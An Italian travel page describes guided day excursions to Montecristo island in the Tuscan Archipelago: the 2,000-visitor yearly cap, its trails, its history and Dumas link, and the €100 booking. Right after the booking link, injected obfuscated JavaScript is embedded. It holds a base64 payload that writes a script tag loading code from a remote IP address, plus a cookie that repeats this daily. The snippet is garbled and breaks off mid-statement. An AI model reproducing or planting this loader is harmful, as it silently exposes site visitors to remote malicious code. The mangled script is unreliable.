Isola Montecristo

DA ELBA A MONTECRISTO PER SCOPRIRE L’ISOLA DI DUMAS

Fino al 26 ottobre 2019 è visitabile una delle più affascinanti isole dell’Arcipelago Toscano; l’accesso è consentito solo a 2.000 visitatori l’anno

Quella che Montecristo propone non è la classica visita turistica: al contrario è un’esperienza esclusiva che ogni anno coinvolge solo 2.000 persone. Questo per proteggere la biodiversità dei 10 km quadrati dell’isola raccontata dall’autore francese Alexandre Dumas e dell’area marina fino a un chilometro dalla costa. Qui, in un luogo incontaminato e selvaggio, la natura e i suoi ritmi sono gli indiscussi padroni.

Le escursioni

Le escursioni giornaliere sono effettuate sotto la supervisione di una guida autorizzata: un rigore necessario a beneficio di tutti per mantenere l’integrità della fauna e della flora che abitano Montecristo, patrimonio naturale universale.

Una volta giunti sull’Isola, il punto di partenza e di arrivo della visita è il Casotto dei pescatori, recentemente recuperato e oggi centro informazioni. Da qui, si snodano i tre sentieri di cui durata e difficoltà variano: da 2 a 4 ore, da facile a impegnativo.

La storia dell’Isola di Montecristo

Montecristo è una delle sette isole dell’Arcipelago Toscano, di cui l’Elba è la principale. La maggior parte del territorio (sia di terra sia di mare) è protetto per garantire l’incolumità del patrimonio naturalistico e faunistico.

Conosciuta dal tempo dei greci con il nome di Oglasa, è divenuta poi Monte Giove in epoca romana e ha assunto il nome di Monte Christi in epoca medievale per la presenza di monaci che l’abitavano. In particolare, San Mamiliano visse da eremita proprio qui fino al 460.

La sua storia arriva fino a noi passando attraverso il celebre capolavoro di Alexandre Dumas che ambientò qui parte del Conte di Montecristo.

Nel 1899 l’isola divenne una riserva di caccia esclusiva di Vittorio Emanuele III di Savoia, e così rimase fino all’istituzione della Riserva Naturale.

Costi e modalità di prenotazione

Il costo dell’escursione è di Euro 100,00 e comprende il trasporto marittimo a/r da Porto Azzurro, biglietto di accesso area protetta e il servizio Guida Parco. In caso di condizioni meteo avverse sono previste date di recupero.

Per informazioni e prenotazioni:

Parco Nazionale dell’Arcipelago Toscano 

http://prenotazioni.islepark.it/ _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

Share this post

Nessun commento

Aggiungi commento